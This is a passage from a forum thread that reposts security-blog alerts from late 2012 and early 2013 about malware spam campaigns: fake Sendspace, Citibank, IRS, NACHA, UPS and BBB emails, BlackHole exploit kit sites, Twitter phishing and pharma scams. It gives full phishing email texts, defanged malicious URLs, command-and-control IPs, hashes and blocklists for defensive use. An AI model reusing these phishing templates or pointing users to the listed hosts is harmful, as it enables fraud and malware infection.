It also drops the following MD5s:
MD5: 9e7577dc5d0d95e2511f65734249eba9
MD5: 61bb88526ff6275f1c820aac4cd0dbe9
MD5: b360fec7652688dc9215fd366530d40c
MD5: f6ee1fcaf7b87d23f09748cbcf5b3af5
MD5: d7a950fefd60dbaa01df2d85fefb3862
MD5: ed662e73f697c92cd99b3431d5d72091
It then phones back to 209.51.221.247/AJtw/UCyqrDAA/Ud+asDAA. We’ve already seen the same command and control server used in the following previously profiled malicious campaigns..."
* https://www.virustotal.com/file/2226d1d4d8c68160ae1fe7393655b30eadb3da3771347228a9583d3313d1fc10/analysis/
File name: readme.exe
Detection ratio: 32/45
Analysis date: 2012-12-20
___
Sendspace "You have been sent a file" SPAM / apendiksator .ru
- http://blog.dynamoo.com/2012/12/sendspace-you-have-been-sent-file-spam.html
20 Dec 2012 - "This fake Sendspace spam leads to malware on apendiksator .ru:
Date: Thu, 20 Dec 2012 09:25:36 -0300
From: "SHIZUKO Ho"
Subject: You have been sent a file (Filename: [redacted]-28.pdf)
Sendspace File Delivery Notification:
You've got a file called [redacted]-6110219.pdf, (286.58 KB) waiting to be downloaded at sendspace.(It was sent by SHIZUKO Ho).
You can use the following link to retrieve your file:
Download Link
The file may be available for a limited time only.
Thank you,
sendspace - The best free file sharing service.
Please do not reply to this email. This auto-mailbox is not monitored and you will not receive a response.
===
Date: Thu, 20 Dec 2012 05:05:02 +0100
From: "GENNIE Hensley"
Subject: You have been sent a file (Filename: [redacted]-7123391.pdf)
Sendspace File Delivery Notification:
You've got a file called [redacted]-38335.pdf, (282.44 KB) waiting to be downloaded at sendspace.(It was sent by GENNIE Hensley).
You can use the following link to retrieve your file:
Download Link
The file may be available for a limited time only.
Thank you,
sendspace - The best free file sharing service.
Please do not reply to this email. This auto-mailbox is not monitored and you will not receive a response.
The malicious payload is at [donotclick]apendiksator .ru:8080/forum/links/column.php hosted on:
91.224.135.20 (Proservis UAB, Lithunia)
187.85.160.106 (Ksys Soluções Web, Brazil)
210.71.250.131 (Chunghwa Telecom, Taiwan)
These IPs and domains are all related and should be blocked:
91.224.135.20
187.85.160.106
210.71.250.131
afjdoospf .ru
angelaonfl .ru
akionokao .ru
apendiksator .ru ..."
___
"New message" SPAM, fake dating sites and libertymonings .info
- http://blog.dynamoo.com/2012/12/new-message-spam-fake-dating-sites-and.html
20 Dec 2012 - "This "New message" themed spam leads to both a fake anti-virus page and a Java exploit on the domains site-dating2012 .asia and libertymonings .info. There's some cunning trickery going on here too. First of all, let's start with some spam examples:
Date: Thu, 20 Dec 2012 20:50:17 -0200
From: "SecureMessage System" [2F5DEE622 @hungter .com]
Subject: New message
Click here to view the online version.
New private message from Terra Fisher received.
Total unread messages: 5
[ Read now ]
Copyright 2012 SecureMessage System. All rights reserved.
If you would like to update your profile or unsubscribe, please click here.
PLEASE DO NOT REPLY TO THIS MESSAGE.
If you require Technical Support, please check Support Center for information.
-------------------------
Date: Thu, 20 Dec 2012 20:36:14 -0200
From: "Secure Message" [82E8ACBD @lipidpanel .com]
Subject: New message
Click here to view the online version.
New private message from Josefina Albert received.
Total unread messages: 3
[ Read now ]
Copyright 2012 SecureMessage System. All rights reserved.
If you would like to update your profile or unsubscribe, please click here.
PLEASE DO NOT REPLY TO THIS MESSAGE.
If you require Technical Support, please check Support Center for information.
In these cases, the targets URLs are [donotclick]site-dating2012c .asia/link.php and [donotclick]site-dating2012 .asia/link.php both hosted on 46.249.42.161 (Serverius Holding, Netherlands) and pretty much the same as the ones found a couple of days ago hiding out on 46.249.58.211(also at Serverius Holding). These look like dating URLs, so you might assume that they are either a) a legitimate dating site or b) just some dating spam rather than malware. In any case, appearances are deceptive and it leads to fake AV site that seems to be very similar to this one. The deception goes a little deeper, because the link.php pages even forward through a fake affiliate-style link such as [donotclick]best-dating2010 .info/?affid=00110&promo_type=5&promo_opt=1 before they get to the fake anti-virus page. The site also contains an apparent Java exploit that loads in from libertymonings .info on 84.200.77.218 (Misterhost, Germany) which was also used in this attack. The malicious code is found at the page [donotclick]libertymonings .info/index/zzz/?a=YWZmaWQ9MDAxMTA= which attempts to download a Java exploit from [donotclick]libertymonings .info/analizator_data/ztsvgnvlmhe-a.qsypes.jar which is pretty thinly detected according to VirusTotal*.
The following IPs and domains are all related and should be blocked if you can:
46.249.42.161
46.249.58.211
84.200.77.218..."
* https://www.virustotal.com/file/77858e249c3017fe5bfa8fb99338eae0d82cb3d4b9c42bc61d4361ddb41fb45a/analysis/1356045558/
File name: ztsvgnvlmhe-a.qsypes.jar
Detection ratio: 6/45
Analysis date: 2012-12-20
:mad::mad:
AplusWebMaster
2012-12-21, 17:14
FYI...
Malware sites to block 21/12/12
- http://blog.dynamoo.com/2012/12/malware-sites-to-block-211212.html
21 Dec 2012 - "There are a series of malware domains on 91.201.215.173 apparently using a Java and PDF exploit to infect visitors. The infection machanism appears to be coming from an unidentifiedad running on the centerblog .net blogging system (I think specifically [donotclick]zezete2.centerblog .net/i-247-136-1356095651.html)
The malware URLs are quite lengthy and appear to be resistant to analysis, in the attack I have seen the following URLs were in use (don't visit these sites, obviously)
[donotclick]svwlekwtaign.avigorstats .pro/nfzU990ANRE02JVS0Qk7s0jYN40nDNx0dbn217t
Yy0jp8q0NKcl0kgxI0L8Gt15rue0vRer0M2Lr0fIED/
[donotclick]mcruxdufxwnp.avigorstats .pro/nfzU990ANRE02JVS0Qk7s0jYN40nDNx0dbn217t
[break]Yy0jp8q0NKcl0kgxI0L8Gt15rue0vRer0M2Lr0fIED/
[break]indicated where I've added a linebreak to get it to fit on the page, remove that and the linebreak for a valid URL.
avigorstats .pro and its subdomains are hosted on 91.201.215.173 (PS Internet Company Ltd, Kazakhstan, but this is just the tip of a -huge- iceberg of malicious IPs and domains that are all interconnected.
Let's start with my personal recommended blockist. If you are in Russia or Ukraine then you might want to be a bit more conservative with the Russian netblocks and refer to the raw IP list below (there's one list with ISPs listed, one plain for for copy and pasting)..
Recommended blockist (annotated)...
Recommended blockist (Plain list)..."
(Too long to post here - see the dynamoo URL above - 'great list to use!)
___
[b]Profile Spy...
- http://www.gfi.com/blog/profile-spy-resurrects-on-eve-of-mayan-apocalypse/
Dec 21, 2012 - "... Profile Spy, a once viral scam on Facebook and Twitter that entices users to check out who have been viewing their profiles. Today, on the eve of the rumored 'EoW', it has decided to rear its ugly head once more... the criminals behind it have used a number of tactics to make users hand over their credentials or give them money — like asking users to “Like” their page, answer surveys and copy and paste a code into the address bar. This time, the scammers have used a lot of elements in this effort. One is Facebook, the other two are Tumblr and the Google Chrome Web Store. This scam starts off as a Facebook event invitation spammed to random users who are part of the mark’s network, a social engineering tactic already done in the past. Since the “event” is public, anyone can visit the page if the URL is shared... Visiting any of the links on the comment posted on the page leads users to a Tumblr profile. Clicking “Get it here” then leads users to a similar looking page, which is using Amazon‘s web service, where they can download the Facebook Profile Spy v2.0 for the Google Chrome Internet browser... This rogue extension, once installed, is capable of doing three things: firstly, it updates the mark’s Facebook status by sharing an image and commenting on it — secondly, the extension displays a fake “security CAPTCHA check” pop-up window where the mark can fill in names of persons in his/her network. This then results in the creation of the Profile Spy “event” invitation... Watch that mouse pointer... careful where you direct and click it."
(Screenshots and more info available at the gfi URL above.)
___
Fake ‘Citi Account Alert’ emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2012/12/21/fake-citi-account-alert-themed-emails-lead-to-black-hole-exploit-kit/
Dec 21, 2012 - "Cybercriminals are currently mass mailing hundreds of thousands of emails impersonating Citi, using -two- different professionally looking email templates. Upon clicking on any of the links found in the malicious emails, users are exposed to the client-side exploits served by the latest version of the [u]Black Hole Exploit Kit...
Sample screenshot of the first spamvertised template:
> https://webrootblog.files.wordpress.com/2012/12/citi_email_spam_exploits_malware_social_engineering_black_hole_exploit_kit.png
Sample screenshot of the second spamvertised template:
> https://webrootblog.files.wordpress.com/2012/12/citi_email_spam_exploits_malware_social_engineering_black_hole_exploit_kit_01.png
... Sample client-side exploits serving URLs:
hxxp ://eaglepointecondo .biz/detects/operation_alert_login.php – 59.57.247.185
Name Server: NS1.AMISHSHOPPE .NET – 209.140.18.37 – Email: solaradvent @yahoo .com
Name Server: NS2.AMISHSHOPPE .NET – 211.27.42.138 – Email: solaradvent @yahoo .com
hxxp ://platinumbristol .net/detects/alert-service.php – 59.57.247.185
Name Server: NS1.AMISHSHOPPE .NET – 209.140.18.37 – Email: solaradvent @yahoo .com
Name Server: NS2.AMISHSHOPPE .NET – 211.27.42.138 – Email: solaradvent @yahoo .com
Upon successful client-side exploitation, the campaign drops MD5: b360fec7652688dc9215fd366530d40c * ... Worm:Win32/Cridex.E.
Once executed, the sample performs the following activities:
Accesses Firefox’s Password Manager local database
Creates a thread in a remote process
Installs a program to run automatically at logon ...
Responding to 59.57.247.185 are also the following malicious domains..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/file/2226d1d4d8c68160ae1fe7393655b30eadb3da3771347228a9583d3313d1fc10/analysis/
File name: readme.exe
Detection ratio: 32/45
Analysis date: 2012-12-20
___
‘Work at Home” scams impersonating CNBC spotted in the wild
- http://blog.webroot.com/2012/12/21/spamvertised-work-at-home-scams-impersonating-cnbc-spotted-in-the-wild/
Dec 21, 2012 - "... a currently circulating “Work At Home” scam that’s successfully and professionally impersonating CNBC in an attempt to add more legitimacy to its market proposition – the Home Business System...
Sample screenshot of the spamvertised email impersonating CNBC:
> https://webrootblog.files.wordpress.com/2012/12/fake_cnbc_work_at_home_scam_01.png
Sample screenshot of the fake CNBC news article detailing the success of the Home Business System:
> https://webrootblog.files.wordpress.com/2012/12/fake_cnbc_work_at_home_scam.png
No matter where you click, you’ll always be redirected to the Home Business System.
Sample bogus statistics sent by customers of the system:
> https://webrootblog.files.wordpress.com/2012/12/fake_cnbc_work_at_home_scam_02.png
What’s particularly interesting about this campaign is the way the scammers process credit card details. They do it internally, not through a payment processing intermediary, using basic SSL encryption, featuring fake “Site Secured” logos, including one that’s mimicking the “VeriSign Secured” service. Although the SSL certificate is valid, the fact that they even require your CVV/CVV2 code, without providing adequate information on how they store and actually process the credit card numbers in their possession, is enough to make you extremely suspicious.
Sample spamvertised URLs:
hxxp ://5186d4d1.livefreetimenews .com/
hxxp ://5f4a8abae0.get-more-news .com/
Domains participating in the campaign:
worldnewsyesterday .com – Email: johnjbrannigan @teleworm .us
worldnewsimportant .com – Email: johnjbrannigan @teleworm .us
hbs-system .com – Email: cinthiaheimbignerupbg @hotmail .com
Historically, the following domains were also used in a similar fashion:
homeworkhere .com – Email: zoilaprni4d @yahoo .com
lastnewsworld .com – Email: shirleysmith57 @yahoo .com
homecompanysystem .com – Email: deloristrevertonef53 @yahoo .com
> https://webrootblog.files.wordpress.com/2012/12/fake_cnbc_work_at_home_scam_04.png
Users are advised -not- to click on links found in spam emails, and to never entrust their credit card details to someone who’s spamvertising you using the services of some of the most prolific botnets currently online."
:mad: :mad:
AplusWebMaster
2012-12-22, 23:58
FYI...
"New message received" SPAM / siteswillsrockf .com and undering .asia
- http://blog.dynamoo.com/2012/12/new-message-received-spam.html
22 Dec 2012 - "This malicious spam run is part of this large cluster of malicious sites that I wrote about yesterday ( http://blog.dynamoo.com/2012/12/malware-sites-to-block-211212.html ).
Date: Sat, 22 Dec 2012 16:55:38 +0300
From: "Secure.Message" [FAA55EEEE @valencianadeparketts .es]
Subject: New message received
Click here to view the online version.
Hello [redacted],
You have 5 new messages.
Read now
Copyright 2012 SecurePrivateMessage. All rights reserved.
If you would like to update your profile or unsubscribe, please click here.
PLEASE DO NOT REPLY TO THIS MESSAGE.
If you require Technical Support, please check Support Center for information.
Unlike most recent campaigns where the first link in the email is a legitimate but hacked site, this one links directly to a malware server at [donotclick]undering .asia/link.php?login.aspx=[emailaddress]&id=[redacted] with a link that features the email address as part of the URL (presumably to confirm that the address is live). The next step is a redirector link at [donotclick]undering .asia/?affid=00110&promo_type=5&promo_opt=1 which loads a fake anti-virus page, and then it attempts to download a Java exploit from [donotclick]siteswillsrockf .com/?a=YWZmaWQ9MDAxMTA=
undering .asia is hosted on 46.249.42.161, and siteswillsrockf .com on 46.249.42.168. Seeing two malicious sites so closely together indicates that there is a problem with the netblock, so having a closer look at those IPs shows:
inetnum: 46.249.42.0 - 46.249.42.255 ...
The block 46.249.42.0/24 seems to have been suballocated to an unidentified customer of Serverius* who have a long history of badness in their IP ranges. Based on this, I would suggest that you add the 46.249.42.0/24 range to your blocklist to prevent other unidentified malicious servers in this block from being a problem.
There are lots of other suspect domains on these two IPs as well:
46.249.42.161 ...
46.249.42.168 ..."
(Too many to post here - see the dynamoo URL above for more detail.)
* https://www.google.com/safebrowsing/diagnostic?site=AS:50673
:mad: :fear:
AplusWebMaster
2012-12-24, 04:56
FYI...
Fake "SecureMessage" SPAM / infiesdirekt .asia, pacesetting .asia and siteswillsrockf .net
- http://blog.dynamoo.com/2012/12/securemessage-spam-infiesdirektasia.html
23 Dec 2012 - "Another fake "SecureMessage" spam leading to malware, the same in principle to this spam run* and again hosted on the same Serverius-owned** IPs of 46.249.42.161 and 46.249.42.168. There are several variants of the spam, but they are all very similar and look something like this:
Date: Sun, 23 Dec 2012 14:26:32 +0530
From: "Secure.Message"
Subject: Alert: New message
Click here to view the online version.
Hello [redacted],
You have 4 new messages.
Read now
Copyright 2012 SecureMessage. All rights reserved.
If you would like to update your profile or unsubscribe, please click here.
PLEASE DO NOT REPLY TO THIS MESSAGE.
If you require Technical Support, please check Support Center for information.
... suspect that there is more malicious activity in the 46.249.42.0/24 range and blocking access to it would be a very good thing to do. These are the malicious domains that I can currently identify on those IPs..."
(Long list at the dynamoo URL above.)
* http://blog.dynamoo.com/2012/12/new-message-received-spam.html
** https://www.google.com/safebrowsing/diagnostic?site=AS:50673
:mad:
AplusWebMaster
2012-12-26, 15:51
FYI...
Eastern bloc SPAM...
- http://blog.dynamoo.com/2012/12/godless-eastern-bloc-commie-athiests.html
25 Dec 2012 - "... eastern bloc... spammers are sending out today.
Date: Tue, 25 Dec 2012 22:56:51 -0700
From: "Ticket Support"
Subject: Password Assistance
Thank you for your letter of Dec 25, your information arrived today.
Alright, here's the link to the site:
Proceed to Site
If we can help in any way, please do not hesitate to contact us.
Regards, Yuonne Ferro, Support Team manager.
Some variants of the body text:
- "Thank you for contacting us, your information arrived today."
- "Thank you for your letter regarding our products and services, your information arrived today."
- "Thank you for considering our products and services, your information arrived today."
Some alternative sender names: "Jonie Gunther", "Noreen Macklin", "Bonny Oconnell". The spamvertised site is hosted on 84.22.104.123, which is Cyberbunker*. Given their awful reputation, I am surprised that they haven't been de-peered. Yet. There's certainly nothing of value at all in the 84.22.96.0/19 range, blocking the whole lot will cause you no harm. These are the other spammy domains on the same IP..."
(More detail at the dynamoo URL above.)
* https://en.wikipedia.org/wiki/CyberBunker#Russian_Business_Network
"... a host of the infamous Russian Business Network cyber-crime gang..."
> https://www.google.com/safebrowsing/diagnostic?site=AS:34109
___
Pharmaceutical scammers spamvertise YouTube emails - counterfeit drugs...
- http://blog.webroot.com/2012/12/25/pharmaceutical-scammers-spamvertise-youtube-themed-emails-entice-users-into-purchasing-counterfeit-drugs/
Dec 25, 2012 - "Pharmaceutical scammers are currently spamvertising a YouTube themed email campaign, attempting to socially engineer users into clicking on the links found in the legitimately looking emails. Upon clicking on the fake YouTube personal message notification, users are -redirected- to a website reselling popular counterfeit drugs. The cybercriminals behind the campaign then earn revenue through an affiliate network...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/12/pharmaceutical_scam_email_spam_youtube.png?w=373&h=244
Once users click on the link found in the email, they’re redirected to the following holiday-themed pharmaceutical web site:
> https://webrootblog.files.wordpress.com/2012/12/pharmaceutical_scam_email_spam_youtube_01.png?w=1009
Spamvertised URL: hxxp ://roomwithaviewstudios .com/inherits.html
Landing URL: hxxp ://canadapharmcanadian .net – 109.120.138.155
... fraudulent pharmaceutical sites have also been known to respond to the same IP (109.120.138.155)...
(More detail at the webroot URL above.)...
This isn’t the first time that we’ve intercepted attempts by pharmaceutical scammers to socially engineer potential customers into clicking on the links found in legitimately looking emails. In the past, we’ve found fake Google Pharmacies and emails impersonating YouTube and Twitter, as well as Facebook Inc., in an attempt to add more authenticity and legitimacy to their campaigns. We expect to see -more- of these campaigns in 2013, with a logical peak over the next couple of days, so watch what you click on, don’t enter your credit card details on websites found in spam emails, and never bargain with your health."
___
Fake E-billing SPAM / proxfied .net
- http://blog.dynamoo.com/2012/12/e-billing-spam-proxfiednet.html
26 Dec 2012 - "There are various e-billing spam emails circulating today, pointing to malware on proxfied .net:
Date: Wed, 26 Dec 2012 18:49:37 +0300
From: alets-no-reply @customercenter .citibank .com
Subject: Your Further eBill from Citibank Credit Card
Member: [redacted]
Add alerts@ serviceemail2. citibank .com to your address book to ensure delivery.
Your Account: Important Warning
New eBill Available
Account Number: **************8
Due Date: 12/28/2012
Amount Due: 175.36
Minimum Amount Due: 175.36
How do I view this bill?
1. Sign on to Citibank Online using this link.
2. Use the Payments Menu to find the bill mentioned in this message.
3. Select View Bill to review your bill details. Select the icon to see your bill summary.
Please don't reply to this message.
If you have any questions about your bill, please contact Citibank Credit Card directly. For online payment questions, please choose Bill Payment from the menu.
E-mail Security Zone
At the top of this message, you'll see an E-mail Security Zone. Its purpose is to help you examine that the e-mail was actually sent by Citibank. If you have questions, please visit our help center. To learn more about fraud, click "Security" at the bottom of the screen.
To set up alerts sign on by clicking this link and go to Account Profile.
I prefer not to have this email contain specific information from my statement. Please send me just the announcement that my statement is ready to view online.
View Your Account Pay Your Bill Contact Us
Privacy | Security
Email Preferences
If you want to communicate with us in writing concerning this email, please direct your correspondence to:
Citibank Customer Care Service
P. O. Box 6200
Sioux Hills, SD 57870
Help / Contact Us
If you have questions about your account, please use our secure message center by signing on at by clicking this link and clicking on "Contact Us" from the "Help / Contact Us" menu.
2012 Citibank, N.A.
All rights reserved.
Citi, Citibank and Citi with Arc Design are registered service marks of Citigroup Inc.
3843054050826645
1/LO/439463/221/1I/6H/EH/7126/SYSTEF1 /E5225514741628064/2187
====================
(More sample FAKE emails shown at the dynamoo URL above.)
The malicious payload is at [donotclick]proxfied.net/detects/inform_rates.php hosted on 59.57.247.185 in China (a well-known malware IP address) along with these following malicious domains:
sessionid0147239047829578349578239077 .pl
latticesoft .net
proxfied .net ..."
___
Fake NACHA SPAM / bunakaranka .ru:
- http://blog.dynamoo.com/2012/12/nacha-spam-bunakarankaru.html
26 Dec 2012 - "This fake ACH / NACHA spam leads to malware on bunakaranka .ru:
Date: Wed, 26 Dec 2012 06:48:11 +0100
From: Tagged [Tagged @taggedmail .com]
Subject: Re: Fwd: Banking security update.
Dear Online Account Operator,
Your ACH transactions have been
temporarily disabled.
View details
Best regards,
Security department
The malicious payload is on [donotclick]bunakaranka .ru:8080/forum/links/column.php hosted on the following well-known IPs:
91.224.135.20 (Proservis UAB, Lithuania)
187.85.160.106 (Ksys Soluções Web, Brazil)
210.71.250.131 (Chunghwa Telecom, Taiwan)
Plain list:
91.224.135.20
187.85.160.106
210.71.250.131
Associated domains..."
:mad: :mad:
AplusWebMaster
2012-12-27, 17:16
FYI...
Fake Twitter DM emails leads to Canadian Pharma SPAM
- http://www.gfi.com/blog/fake-twitter-dm-emails-leads-to-canadian-pharma-spam/
Dec 27, 2012 - "We’re seeing quite a few of these “Can I use your…” style messages arriving in mailboxes, taking the form of fake Twitter DM notifications. The most common fakeouts seem to be asking about videos and photographs.
> http://www.gfi.com/blog/wp-content/uploads/2012/12/twitterpicpublish1.png
"Hello, Can i publish link to your photo on my web page?" Another one says:
"Hi. Can i publish link to your video on my home page?"
In both cases, the emails will lead end-users to sites that are most definitely not Twitter. Some of the URLs are offline, but here’s one that is still standing:
> http://www.gfi.com/blog/wp-content/uploads/2012/12/twitterpicpublish2.jpg
Festive Pharma spam – probably not what you need in your post-Xmas stocking. Do your best to steer clear of these."
___
Fake British Airways E-ticket receipts serve malware
- http://blog.webroot.com/2012/12/26/cybercriminals-resume-spamvertising-british-airways-themed-e-ticket-receipts-serve-malware/
Dec 26, 2012 - "... Cybercriminals have resumed spamvertising fake British Airways themed E-receipts — we intercepted the same campaign back in October — in an attempt to trick its customers into executing the malicious attachment found in the emails...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/12/british_airways_email_spam_eticket_malware.png?w=553
Sample detection rate for the malicious attachment:
MD5: b46709cf7a6ff6071a6342eff3699bf0 * ... Worm:Win32/Gamarue.I
Upon execution, it creates the following mutex on infected hosts: SHIMLIB_LOG_MUTEX
It also initiates POST requests to the following IP: 87.255.51.229/ff/image.php
As well as DNS requests to the following hosts:
zzbb45nnagdpp43gn56 .com – 87.255.51.229
a9h23nuian3owj12 .com – 87.255.51.229
zzbg1zv329sbgn56 .com – 87.255.51.229
http ://www.update .microsoft .com – 65.55.185.26
ddbbzmjdkas .us
ddbbzmjdkas .us
The IPs are currently sinkholed by Abuse.ch..."
* https://www.virustotal.com/file/fa3e8f3ca8bccc8556233f13918b0fdf74bc53f2762bf7699b984767c4ee91c9/analysis/1356554124/
File name: BritishAirways-eticket.exe
Detection ratio: 39/46
Analysis date: 2012-12-26
___
Fake ‘UPS Delivery Confirmation Failed’ emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2012/12/27/fake-ups-delivery-confirmation-failed-themed-emails-lead-to-black-hole-exploit-kit/
Dec 27, 2012 - "... cybercriminals are currently mass mailing tens of thousands of emails impersonating UPS, in an attempt to trick users into clicking on the malicious links found in the legitimate-looking emails. Once they click on the links, they’re automatically exposed to the client-side exploits served by the BlackHole Exploit kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/12/ups_package_failed_delivery_email_spam_exploits_black_hole_exploit_kit.png?w=603
Sample spamvertised compromised URLs:
hxxp ://www.aberdyn .fr/letter.htm
hxxp ://www.aberdyn .fr/osc.htm
Sample client-side exploits serving URLs:
hxxp ://apendiksator .ru:8080/forum/links/column.php
hxxp ://sectantes-x .ru:8080/forum/links/column.php
Sample malicious payload dropping URL:
hxxp://sectantes-x .ru:8080/forum/links/column.php?uvt=0a04070634&wvqi=33&yrhsb=3307093738070736060b&vjppc=02000200020002
Client-side exploits served: CVE-2010-0188
Although we couldn’t reproduce the client-side exploitation taking place through these domains in the time of posting this analysis, we know that on 2012-09-27 one of the domains (sectantes-x .ru) also served client-side exploits, and dropped a particular piece of malware – MD5: 9f86a132c0a5f00705433632879a20b9 * ... Trojan-Ransom.Win32.PornoAsset.abup.
Upon execution, the sample phones back to the following command and control servers:
178.77.76.102 (AS20773)
91.121.144.158 (AS16276)
213.135.42.98 (AS15396)
207.182.144.115 (AS10297)
More MD5s are known to have phoned back to the same IPs..."
* https://www.virustotal.com/file/56e04562c49321533646b89413154a6c26602c98dd8496f4dd692d6434459be3/analysis/
File name: e284d8a62b6d75b6818ed1150dde2a8bcc3489ee
Detection ratio: 27/42
Analysis date: 2012-09-30
:mad: :mad: :mad:
AplusWebMaster
2012-12-28, 15:15
FYI...
Fake IRS SPAM / tv-usib .com
- http://blog.dynamoo.com/2012/12/irs-spam-tv-usibcom.html
28 December 2012 - "This fake IRS spam leads to malware on tv-usib .com:
Date: Thu, 27 Dec 2012 22:14:44 +0400
From: Internal Revenue Service [information @irs .gov]
Subject: Your transaction is not approved
Your Income Tax outstanding transaction (ID: 3870703170305), recently ordered for processing from your checking account was rejected by Internal Revenue Service payment processing unit.
Canceled Tax transfer
Tax Transaction ID: 3870703170305
Rejection ID See details in the report below
Federal Tax Transaction Report tax_report_3870703170305.pdf (Adobe Acrobat Document)
Internal Revenue Service 3192 Aliquam Rd. Edmond 65332 Oregon
The malicious payload is at [donotclick]tv-usib .com/detects/property-mass-dollar_figure.php hosted on the well-known IP of 59.57.247.185 in China. The following malicious domains appear to be on that IP:
sessionid0147239047829578349578239077.pl
tv-usib .com
proxfied .net
timesofnorth .net
latticesoft .net ..."
:fear::mad:
AplusWebMaster
2013-01-02, 14:34
FYI...
Malware sites to block - 2 Jan 2013
- http://blog.dynamoo.com/2013/01/malware-sites-to-block-2113.html
2 Jan 2013 - "The following sites and IPs seem to be active today, being pushed out by spam campaigns. I'll post email samples when I get them...
91.224.135.20
187.85.160.106
210.71.250.131
afjdoospf .ru
akionokao .ru
bilainkos .ru
bumarazhkaio .ru
bunakaranka .ru ..."
___
Malware sites to block - 2 Jan 2013 part II
- http://blog.dynamoo.com/2013/01/malware-sites-to-block-2113-part-ii.html
2 Jan 2013 - "Here's a bunch of malicious IPs and domains to block, mostly based on this in-depth research* at the Malware Must Die! blog.
* http://malwaremustdie.blogspot.com/2012/12/what-happened-if-red-kit-team-up-with.html
As far as I can see, the domains in use are exclusively compromised consumer PCs dotted around the globe, rather than compromised or evil web servers.. so the ISPs are pretty irrelevant in this case. This type of infected host has a relatively short shelf-life, possibly just a few days, so you may or may not want to add them to your blocklist.
IPs... Domains ..."
(Long list at the dynamoo URL above.)
:mad:
AplusWebMaster
2013-01-04, 15:43
FYI...
Twitter Phish DMs: “This profile on Twitter is spreading nasty blogs around about you”
- http://www.gfi.com/blog/twitter-phish-dms-this-profile-on-twitter-is-spreading-nasty-blogs-around-about-you/
Jan 4, 2013 - "... the following missive doing the rounds on Twitter via DMs on compromised accounts:
> http://www.gfi.com/blog/wp-content/uploads/2013/01/twitspam1.jpg
There’s a number of URLs and fake logins being posted right now to users in a wide range of geographical locations, and it all comes down to Twitter phishing with at least one of the phish URLs being registered to an individual claiming to be located in Shanghai, China. That particular site - ivtvtter(dot)com – is currently offline (and also listed in Phishtank*)... attempting to login would result in a 404 error then a redirect to the real Twitter site to make everything look nice and legitimate. These types of Twitter scam come around often, and end-users should always be wary of “Have you seen this” style messaging from contacts..."
* http://www.phishtank.com/phish_detail.php?phish_id=1643038
___
Fake Ebay/Paypal emails lead to client-side exploits and malware
- http://blog.webroot.com/2013/01/04/fake-you-have-made-an-ebay-purchase-themed-emails-lead-to-client-side-exploits-and-malware/
Jan 4, 2013 - "Over the past 24 hours, cybercriminals have launched yet another massive spam campaign, this time impersonating both eBay and PayPal, in an attempt to trick their users into clicking on the client-side exploits and malware serving links found in the malicious emails...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/paypayl_ebay_purchase_email_spam_exploits_malware_black_hole_exploit_kit.png
... Malicious domain names reconnaissance:
litefragmented .pro – 59.64.144.239 – Email: kee_mckibben0869 @macfreak .com
Name Server: NS1.CHELSEAFUN .NET
Name Server: NS2.CHELSEAFUN .NET...
... ibertomoralles .com – 59.57.247.185 – Email: rick.baxter @costcontrolsoftware .com
Name Server: NS1.SOFTVIK .NET – 84.32.116.189 – Email: farbonite @hotmail .com
Name Server: NS2.SOFTVIK .NET – 15.209.33.133 – Email: farbonite @hotmail .com ...
___
Fake 'bank reports' emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2013/01/03/attention-changes-in-the-bank-reports-themed-emails-lead-to-black-hole-exploit-kit/
Jan 3, 2013 - "Cybercriminals are currently spamvertising tens of thousands of emails in an attempt to impersonate the recipients’ bank, tricking them into thinking that the Ministry of Finance in their country has introduced new rules for records keeping, and that they need to print and sign a non-existent document. Once users click on the links found in the malicious emails, they’re automatically exposed to the client-side exploits served by the latest version of the BlackHole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/email_spam_changed_bank_reports_exploits_malware_black_hole_exploit_kit.png
... Malicious domain name reconnaissance:
apendiksator .ru – 91.224.135.20; 210.71.250.131; 187.85.160.106
Name server: ns1.apendiksator .ru – 62.76.186.24
Name server: ns2.apendiksator .ru – 110.164.58.250
Name server: ns3.apendiksator .ru – 42.121.116.38
Name server: ns4.apendiksator .ru – 41.168.5.140
Responding to the same IPs are also the following malicious domains part of the campaign’s infrastructure:
afjdoospf .ru – 91.224.135.20
angelaonfl .ru – 91.224.135.20
akionokao .ru – 91.224.135.20 ...
Although we couldn’t reproduce the malicious payload at apendiksator .ru, we found that the malicious payload served by immerialtv .ru (known to have responded to the same IP) is identical to the MD5: 83db494b36bd38646e54210f6fdcbc0d * ... VirTool:Win32/CeeInject. This MD5 was dropped in a previously profiled campaign..."
* https://www.virustotal.com/file/6260bd364a625d7cbb270c9036473e44f5f8ec479f264f2280d25bf9d56d73da/analysis/
File name: cs8v0k.exe
Detection ratio: 34/42
Analysis date: 2012-06-20
___
Fake BBB (Better Business Bureau) emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2013/01/02/fake-bbb-better-business-bureau-notifications-lead-to-black-hole-exploit-kit/
Jan 2, 2013 - "Cybercriminals have recently launched yet another massive spam campaign, impersonating a rather popular brand used in a decent percentage of social engineering driven email campaigns – the BBB (Better Business Bureau). Once users click on any of the links in the malicious emails, they’re automatically exposed to the client-side exploits served by the BlackHole Exploit kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/email_spam_bbb_better_business_bureau_exploits_malware_black_hole_exploit_kit.png
... Malicious domain name reconnaissance:
tv-usib.com – 59.57.247.185 – Email: twine.tour1 @yahoo .com
Name Server: NS1.AMISHSHOPPE .NET - Email: solaradvent @yahoo .com
Name Server: NS2.AMISHSHOPPE .NET - Email: solaradvent @yahoo .com...
Upon successful client-side exploitation, the campaign drops MD5: 2646f13db754654aff315ff9da9fa911 * ... Worm:Win32/Cridex.E.
Upon execution, the sample phones back to: 94.73.129.120 :8080/rxrt0CA/hIvhA/K66fEB/ ..."
* https://www.virustotal.com/file/4dec5c7de72d15d2137c51b1a78e4a61f62c718c7039ad87925095e04e101bff/analysis/
File name: KB00182962.exe
Detection ratio: 30/45
Analysis date: 2013-01-04
___
Fake Verizon Wireless emails serve client-side exploits and malware
